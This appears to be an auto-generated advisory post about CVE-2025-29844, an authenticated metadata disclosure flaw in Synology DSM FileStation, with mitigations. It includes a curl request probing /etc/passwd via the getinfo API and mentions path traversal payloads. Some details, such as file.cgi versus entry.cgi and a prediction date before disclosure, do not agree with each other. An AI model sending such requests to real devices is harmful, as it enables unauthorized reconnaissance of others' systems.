Synology DSM FileStation Information Disclosure Vulnerability CVE-2025-29844 (Medium)

By /

Listen to this Post

How the CVE Works:

The vulnerability resides within the `file.cgi` component of Synology DiskStation Manager’s (DSM) FileStation application. A remote attacker who has already obtained authenticated access to the system can craft a specific HTTP request to this CGI endpoint. The flaw is triggered due to improper validation or sanitization of user-supplied input parameters within the request. By manipulating these parameters, such as file identifiers or path variables, the attacker can bypass intended access controls. This allows the querying of files and directories outside the user’s permitted scope. Instead of returning the file content, the vulnerable endpoint erroneously responds with metadata information. This metadata includes details like file names, directory paths, timestamps, and potentially size information for objects the attacker should not be able to enumerate. The exploit does not grant direct file read or write capabilities but reveals sensitive filesystem structure and data location, facilitating further targeted attacks.

DailyCVE Form:

Platform: Synology DSM
Version: Multiple versions
Vulnerability : Information Disclosure
Severity: Medium
date: 2025-12-04

Prediction: 2025-01-15

What Undercode Say:

Analytics:

curl -k -X GET "https://<TARGET_IP>:5000/webapi/entry.cgi?api=SYNO.FileStation.File&method=getinfo&version=1&additional=%5B%22real_path%22%5D&path=%5B%22/etc/passwd%22%5D" -b "sid=<VALID_SESSION_ID>"

grep -r "file.cgi" /usr/syno/synoman/webapi/ | grep -i "getinfo"

strings /usr/syno/synoman/webapi/file.cgi | grep -A5 -B5 "real_path"

How Exploit:

Authenticated attacker crafts malicious HTTP request to file.cgi‘s `getinfo` method with path traversal payloads (e.g., ../../etc) to query unauthorized locations and retrieve metadata in the JSON response.

Protection from this CVE:

Apply Synology update.

Restrict FileStation access.

Implement network segmentation.

Impact:

Sensitive filesystem enumeration.

Information leakage.

Initial reconnaissance foothold.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top